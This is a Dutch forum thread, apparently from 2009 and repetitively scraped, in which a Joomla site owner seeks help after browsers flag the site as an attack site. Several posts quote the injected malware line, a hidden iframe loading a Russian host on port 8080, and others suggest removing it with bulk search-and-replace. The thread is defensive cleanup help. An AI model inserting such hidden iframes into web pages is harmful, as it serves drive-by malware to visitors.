Aanvalssite
als ik naar mijn site ga met firefox krijg ik een melding van gerapporteerde aanvalssite, waarschijnlijk krijgen andere bezoekers dit dus ook, hoe krijg ik dit voor iedereen weg?
weggehaald omdat ik anders een foutmelding kreeg:
Parse error: syntax error, unexpected '<' in /var/www/vhosts/vvhunsingo.nl/httpdocs/index.php on line 90 het is dus een joomla site en ik had deze regel
Gebruik uw virusscanner om het virus te neutraliseren
Hoe doe ik dit? er staat:
Het virus staat namelijk LOKAAL en niet alleen op je server..
Wat ik heb gedaan is : backup maken van mn hele FTP, FTP HELEMAAL leeggegooid, daarna Adaware en avast scans gedaan, en dan alles weer op de FTP gezet... Je virus scannen gebruiken om het virus te neutraliseren meestal....
Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..
Als ik na de melding van aanvalssite verder klik naar mn site, zie ik dat hij er ook niet meer normaal uitziet ik heb mn site gescand met Kaspersky maar hij vind niets, wat nu?
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>
Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200 in ieder index bestand op mn site staat nu zo'n regel:
Wat is de huidige status van vvhunsingo.nl?
Deze site is als verdacht aangemerkt - het bezoeken van deze site kan uw computer beschadigen.
Een deel van deze site is in de afgelopen 90 dagen 1 keer aangemerkt wegens verdachte activiteiten.
Wat is er gebeurd toen Google deze site bezocht?
Van de 10 pagina's die we in de afgelopen 90 dagen op de site hebben getest, hebben 5 pagina('s) zonder de toestemming van de gebruiker schadelijke software gedownload en geïnstalleerd. De vorige keer dat Google deze site bezocht, was op 2009-07-12. De vorige keer dat verdachte inhoud op deze site werd aangetroffen, was op 2009-07-11.
Schadelijke software wordt op 1 domein(en) gehost, waaronder a3l.ru/.
This site was hosted on 1 network(s) including AS31477 (DUOCAST).
Heeft deze site gefungeerd als een tussenschakel en geleid tot verdere verspreiding van malware?
Het lijkt erop dat vvhunsingo.nl in de afgelopen 90 dagen niet heeft gefunctioneerd als tussenschakel voor de infectie van sites.
Actual Search And Replace! Gebruik ik vaak..
Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg Ik heb er pas nog last van gehad, een week geleden ofzo. Je moet ook op je error pagina's letten, hij infecteert namelijk bestanden met "index" en je error pagina's.
Gebruik versie 5.4.3 van notepad++ (5.4.4 gaf wat vervelende problemen in windows 7 bij mij) en je kan prima search + replace doen:
http://img339.imageshack.us/img339/4296/capturej.png
Meer krijg ik niet te zien hoor. Database Error: Unable to connect to the database:Could not connect to MySQL Dat is nu weer opgelost maar in Firefox ziet de site er bij mij niet uit zoals het hoort en in Opera wel.(Ook in IE ziet het er bij mij normaal uit)
Google heeft je site als 'verdacht' aangemerkt. Heb je iets geks uitgehaald ermee?
Code (php)
1
<iframe src="http://u9i.ru:8080/index.php" width=173 height=131 style="visibility: hidden"></iframe>
weggehaald omdat ik anders een foutmelding kreeg:
Parse error: syntax error, unexpected '<' in /var/www/vhosts/vvhunsingo.nl/httpdocs/index.php on line 90
http://blog.combell.com/2009/06/21/combell-tech-opgelet-voor-hackers-via-iframe-injection/
i frame injection.. heb ik ook gehad.. Is heel irritant. En als je eenmaal geinfecteerd bent, kan het dus ook overschieten naar andere FTP's waar je op inlogt, dus ook op die van klanten!
edit: Google recommends:http://www.stopbadware.org/home/security
i frame injection.. heb ik ook gehad.. Is heel irritant. En als je eenmaal geinfecteerd bent, kan het dus ook overschieten naar andere FTP's waar je op inlogt, dus ook op die van klanten!
edit: Google recommends:http://www.stopbadware.org/home/security
Gewijzigd op 01/01/1970 01:00:00 door Timen kut
Gebruik uw virusscanner om het virus te neutraliseren
Hoe doe ik dit?
Het virus staat namelijk LOKAAL en niet alleen op je server..
Wat ik heb gedaan is : backup maken van mn hele FTP, FTP HELEMAAL leeggegooid, daarna Adaware en avast scans gedaan, en dan alles weer op de FTP gezet...
Volgens mij is die .ru site inmiddels offline.
Midas schreef op 12.07.2009 14:44:
Volgens mij is die .ru site inmiddels offline.
Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..
Bramboos schreef op 12.07.2009 14:58:
Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..
Hij is ook wel online, alleen je wordt doorgeschakeld naar de host.Midas schreef op 12.07.2009 14:44:
Volgens mij is die .ru site inmiddels offline.
Bij mij is die nog steeds online hoor... En wat het vreemde is dat McAfee SiteAdvisor hem ook nog groen ziet??..
Als ik na de melding van aanvalssite verder klik naar mn site, zie ik dat hij er ook niet meer normaal uitziet
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>
Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200
Gewijzigd op 01/01/1970 01:00:00 door JanWillem BlaBla
Alles uploaden, met dreamweaver zoeken/vervangen op map: (de hoofdmap) en dan dat stukje vervangen in niets. Tadaa :)
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.
Jan Koehoorn schreef op 12.07.2009 12:32:
Google heeft je site als 'verdacht' aangemerkt. Heb je iets geks uitgehaald ermee?
Wat is de huidige status van vvhunsingo.nl?
Deze site is als verdacht aangemerkt - het bezoeken van deze site kan uw computer beschadigen.
Een deel van deze site is in de afgelopen 90 dagen 1 keer aangemerkt wegens verdachte activiteiten.
Wat is er gebeurd toen Google deze site bezocht?
Van de 10 pagina's die we in de afgelopen 90 dagen op de site hebben getest, hebben 5 pagina('s) zonder de toestemming van de gebruiker schadelijke software gedownload en geïnstalleerd. De vorige keer dat Google deze site bezocht, was op 2009-07-12. De vorige keer dat verdachte inhoud op deze site werd aangetroffen, was op 2009-07-11.
Schadelijke software wordt op 1 domein(en) gehost, waaronder a3l.ru/.
This site was hosted on 1 network(s) including AS31477 (DUOCAST).
Heeft deze site gefungeerd als een tussenschakel en geleid tot verdere verspreiding van malware?
Het lijkt erop dat vvhunsingo.nl in de afgelopen 90 dagen niet heeft gefunctioneerd als tussenschakel voor de infectie van sites.
JanWillem117 schreef op 12.07.2009 19:01:
in ieder index bestand op mn site staat nu zo'n regel:
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>
Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200
<iframe src="http://u6c.ru:8080/index.php" width=198 height=125 style="visibility: hidden"></iframe>
Is er ook een manier om dit snel te verwijderen?aangezien het er meer dan 200
Actual Search And Replace! Gebruik ik vaak..
Gewijzigd op 01/01/1970 01:00:00 door Wouter De Schuyter
Afra schreef op 12.07.2009 20:32:
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.
Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg
JanWillem117 schreef op 12.07.2009 21:00:
Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg
Afra schreef op 12.07.2009 20:32:
notepad++ . search, en dan tabblad kan je alles in bestanden in een map vervangen of deleten.
Als ik dat probeer spoort hij wel al die bestanden op maar kan ik het niet wijzigen, dan krijg ik het zo:
http://img144.imagevenue.com/img.php?image=25245_notepad67_122_872lo.jpg
Gebruik versie 5.4.3 van notepad++ (5.4.4 gaf wat vervelende problemen in windows 7 bij mij) en je kan prima search + replace doen:
http://img339.imageshack.us/img339/4296/capturej.png
Meer krijg ik niet te zien hoor.
Bij het openen van bovenstaande link liep mijn computer geheel vast.
Als ik nu naar mn site ga in IE krijg ik een melding dat Adobe Acrobat wil openen, hoe kan dat? Ook krijg ik een melding van een virus, ik had mn site helemaal gescand